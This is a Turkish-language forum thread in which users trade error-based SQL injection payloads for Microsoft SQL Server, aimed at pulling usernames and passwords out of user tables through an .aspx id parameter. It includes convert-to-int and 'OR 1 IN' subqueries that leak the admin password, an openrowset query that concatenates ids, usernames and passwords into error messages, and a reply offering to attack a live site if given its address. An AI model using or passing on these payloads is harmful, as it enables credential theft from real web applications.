

Sql İnjectiondan Anlayan Arkdaslar Acil Yardim
-
Mrb arkdaslar bildiginiz gibi sql injection ile hata mesajlariyla veri okuyabiliyoruz vede kayit ilerletebiliyoruz orneyin
id=convert(int,(select top 1 username from users where users >''a'''));
ve hata mesaji olarak
Conversion failed when converting the varchar value 'Admin' to data type int.
adminden sonra ki veriye ulasmak icinde
id=convert(int,(select top 1 username from users where users >''Admin'''));
...
ama bu sadece string tipi kolonlar icin gecerli peki ben orneyin id kolonunu okumak istedigimde nasil yapacagima dair bi fikri olan varmi
cunku id nin tipi int oldugu icin int inte cevirmede hata alamiyorum (bu arada string demeyin denedim o istedigim hucrenin kolonunu gostermiyor)
simdiden tesekurler
-
Localde denemiyorsan siteyi ver yardımcı olmaya çalışalım
yada mid veya sum fonksiyonlaı yardımcı olur
‘or 1 in (select sifre from kullanicilar where kulladi=’admin’)--
‘ OR in (select min(kulladi) from kullanicilar where username > ‘admin’)—
-
Twitter bunu yazdı:
-----------------------------
Localde denemiyorsan siteyi ver yardımcı olmaya çalışalım
yada mid veya sum fonksiyonlaı yardımcı olur
‘or 1 in (select sifre from kullanicilar where kulladi=’admin’)--
‘ OR in (select min(kulladi) from kullanicilar where username > ‘admin’)—
-----------------------------hocam lokalde deniyorum da soyle bi sey buldum
select * from users where id=(select COUNT(*) from openrowset('sqloledb','server=ENIS-PC;database=Fakulteti;trusted_connection=yes;uid=badperson,pwd=badperson','SELECT CAST(CAST(id AS VARCHAR) + '', ''+ username + '', '' + CAST(password AS VARCHAR) + '', '' + CAST(Drejtimi AS VARCHAR) AS INT), 1 FROM tblUsers;'))
SQL SERVERDE excecute dedigimde calisiyor ve istedigim hatayi aliyorum (o tablodaki ilk satiri ) ama webden .aspx?id= olarak gonderdigimde baska bi hata aliyorumStatement(s) could not be prepared.
Incorrect syntax near ', '.sence sorun nedir ?
-
simdi fark etim browserden o stringi gonderdigimde browser + isaretini de stringe gondermiyor boylece baska bi query olusuyor
SELECT * FROM Produktet WHERE ID=(select COUNT(*) from openrowset('sqloledb','server=ENIS-PC;database=Fakulteti;trusted_connection=yes;uid=badperson,pwd=badperson','SELECT CAST(CAST(NrIndeksit AS VARCHAR) '', '' EmriMbiemri '', '' CAST(FJalekalimi AS VARCHAR) '', '' CAST(Drejtimi AS VARCHAR) AS INT), 1 FROM tblStudentat;'))
hata da baska oluyor peki requeststring olarak aldigim verilerden + nasil gonderebilirim ?
-
Sql injection ile ilgili konu açsa birileri böyle ayrıntılı olarak anlatsa ne güzel oluurdu :D ve sonra bana pm atsa :D
-
halettim